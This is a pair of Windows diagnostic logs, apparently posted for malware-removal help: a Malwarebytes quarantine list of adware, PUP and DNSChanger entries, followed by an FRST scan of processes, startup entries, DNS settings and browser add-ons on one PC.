PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.JacCodwugeif.1, Quarantined, [16a4f98c5d3c75c19910cf3e4fb4f10f],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.OpuKiutkuvaod, Quarantined, [9921bdc8544501359613f617c93ac739],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.OpuKiutkuvaod.1, Quarantined, [c7f31d68d6c3e2548623ca43b44f27d9],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.PesdMehrefj, Quarantined, [308a9ce9455454e2f1b83cd18f743fc1],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.PesdMehrefj.1, Quarantined, [94265e27643540f67039ff0e01021de3],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.CiimLheamojbad, Quarantined, [3882d4b1cccd1c1a5653b7560af98977],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.CiimLheamojbad.1, Quarantined, [ffbb42432574c96d7a2f1feed42fd42c],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.DodpGuokdos, Quarantined, [2a90d1b414851323feab9a73a95a4db3],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.DodpGuokdos.1, Quarantined, [3387305501981d192a7f4bc218ebcf31],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.JacCodwugeif, Quarantined, [2991dfa699006ccab4f544c9c83baa56],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.JacCodwugeif.1, Quarantined, [dcde0c795a3f181e75345db0db281ee2],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.OpuKiutkuvaod, Quarantined, [2b8fd1b42772989e17922fdec43f3ec2],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.OpuKiutkuvaod.1, Quarantined, [ffbb1f667920b5810a9f4bc23ac943bd],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.PesdMehrefj, Quarantined, [cded50359dfc78be1d8ca766e91aba46],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.PesdMehrefj.1, Quarantined, [d4e6a9dc9702c472faaf868740c36d93],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{C8C9C24E-7C07-49A7-8246-3A33AEDB5E65}, Quarantined, [7a406d18edacf3432d7ad73a798b3ec2],
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-18\SOFTWARE\{7008D7D4-671A-438A-AB8B-C3A378FFDEF6}, Quarantined, [86349ce96d2c999d01bcbf4ed1329d63],
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\{7008D7D4-671A-438A-AB8B-C3A378FFDEF6}, Quarantined, [10aa8cf97e1bc1752c9115f8b152b947],
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\SOFTWARE\{7008D7D4-671A-438A-AB8B-C3A378FFDEF6}, Quarantined, [c7f31a6b8d0cda5cc5f78687f11226da],

Registry Values: 5
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{c8c9c24e-7c07-49a7-8246-3a33aedb5e65}|AppPath, C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin, Quarantined, [7a406d18edacf3432d7ad73a798b3ec2]
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-18\SOFTWARE\{7008D7D4-671A-438A-aB8B-C3A378FFDEF6}|Name, C:\Program Files\Phrase Professor191220150009\Uevilvie.exe, Quarantined, [86349ce96d2c999d01bcbf4ed1329d63]
PUP.Optional.DeskBar, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|DeskBar.exe, 8888, Quarantined, [b6044b3a5a3f69cd907cd799e51f5aa6]
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\{7008D7D4-671A-438A-aB8B-C3A378FFDEF6}|Name, C:\Program Files\Phrase Professor191220150009\Uevilvie.exe, Quarantined, [10aa8cf97e1bc1752c9115f8b152b947]
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\SOFTWARE\{7008D7D4-671A-438A-aB8B-C3A378FFDEF6}|Name, C:\Program Files\Phrase Professor191220150009\Uevilvie.exe, Quarantined, [c7f31a6b8d0cda5cc5f78687f11226da]

Registry Data: 1
Trojan.DNSChanger.DNSRst, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, 82.163.142.7 95.211.158.134, Good: (8.8.8.8), Bad: (82.163.142.7 95.211.158.134),Replaced,[7c3e2c5983168ea8e26b23ed0104e21e]

Folders: 1
Adware.LaSuperba, C:\uninst, Quarantined, [c4f6760fadec25115bcbd36758add32d],

Files: 10
Rootkit.Komodia.PUA, C:\WINDOWS\SYSTEM32\drivers\bsdriver.sys, Delete-on-Reboot, [e1d557efc98c6c64feb6c3e3369839c0],
PUP.Optional.Komodia.WnskRST, C:\Windows\System32\Qacsauol64.dll, Quarantined, [25957b0a1d7c44f27e0d4f5f976ad12f],
PUP.Optional.Komodia.WnskRST, C:\Windows\SysWOW64\Qacsauol.dll, Quarantined, [36845530eaaf9f97afa2b2fc956c2cd4],
PUP.Optional.OptimumInstaller, C:\Users\levilaing\Downloads\Setup.exe, Quarantined, [e0daa0e5a5f4fa3cb1e7ef53ed14639d],
PUP.Optional.Komodia.WnskRST, C:\Windows\System32\QacsauolOff.ini, Quarantined, [dedcc3c2584105315b4f23ea9b68b44c],
PUP.Optional.Komodia.WnskRST, C:\Windows\SysWOW64\Qacsauol.ini, Quarantined, [3f7b98ed80197cba8c1ea36a2ad9bf41],
PUP.Optional.Komodia.WnskRST, C:\Windows\SysWOW64\QacsauolOff.ini, Quarantined, [843697ee9306d165adfd937ad03341bf],
PUP.Optional.FakeIELaunch, C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk, Quarantined, [d3e711741c7dcd697d9db681ab590ef2],
Adware.LaSuperba, C:\uninst\uninstall.html, Quarantined, [c4f6760fadec25115bcbd36758add32d],
PUP.Optional.HijackHosts.Gen, C:\Windows\System32\puo\nufn\mhno.dat, Quarantined, [506a93f282171c1ab437a88d9b6a738d],

Physical Sectors: 0
(No malicious items detected)

(end)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by levilaing (administrator) on LEVISPC (09-03-2016 19:47:55)
Running from C:\Users\levilaing\Desktop
Loaded Profiles: levilaing (Available Profiles: levilaing)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamservice.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Windows\System32\valWBFPolicyService.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbam.exe
(AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\conathst.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-10-14] (IDT, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-07-17] (Synaptics Incorporated)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [401192 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201512 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [VitaKeyTSR] => C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisTSR.exe [379248 2010-03-25] (Egis Technology Inc. )
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1282120 2013-05-02] (CANON INC.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-29] (Oracle Corporation)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Power2GoExpress8] => C:\Program Files (x86)\CyberLink\Power2Go8\Power2GoExpress8.exe [1711680 2013-01-27] (CyberLink Corp.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Dashlane] => C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe [227712 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [DashlanePlugin] => C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe [285568 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoLogOff] 0
Lsa: [Notification Packages] EgisPwdFilter EgisDSPwdFilter
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [DhcpNameServer] 82.163.142.7

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\levilaing\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-02-29] (Dashlane)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO-x32: Wondershare Video Converter Ultimate -> {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} -> C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRIEPlugin.dll [2013-06-18] (Wondershare Software Co., Ltd.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-17] (Oracle Corporation)
BHO-x32: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-17] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\levilaing\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-02-29] (Dashlane)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default
FF DefaultSearchEngine: DuckDuckGo
FF DefaultSearchEngine.US: DuckDuckGo
FF SelectedSearchEngine: DuckDuckGo
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.)
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll [2013-06-07] ( HP)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\duckduckgo.xml [2014-10-16]
FF Extension: Ixquick Toolbar - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\extensions\{0D4B5813-2CB5-439D-839C-4638597EFAFA}.xpi [2016-01-12]
FF Extension: Dashlane - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-12-22]
FF Extension: DuckDuckGo Plus - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2016-03-09]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\[email protected] [2016-02-12] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon [2016-01-18]
FF HKLM-x32\...\Firefox\Extensions: [{41ecbc0b-34d5-4cd4-935f-253a30e2cb7e}] - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt
FF Extension: SimplePass Online Accounts Extension - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt [2013-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt
FF Extension: Wondershare Video Converter Ultimate - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt [2015-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt

Chrome:
=======
CHR Profile: C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-07]
CHR Extension: (Google Drive) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-07]
CHR Extension: (YouTube) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-07]
CHR Extension: (Google Search) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-07]
CHR Extension: (Website Logon) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanflfepiobnpjbljmngfgegijhdpljm [2014-07-07]
CHR Extension: (Google Wallet) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-07]
CHR Extension: (Gmail) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-07]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
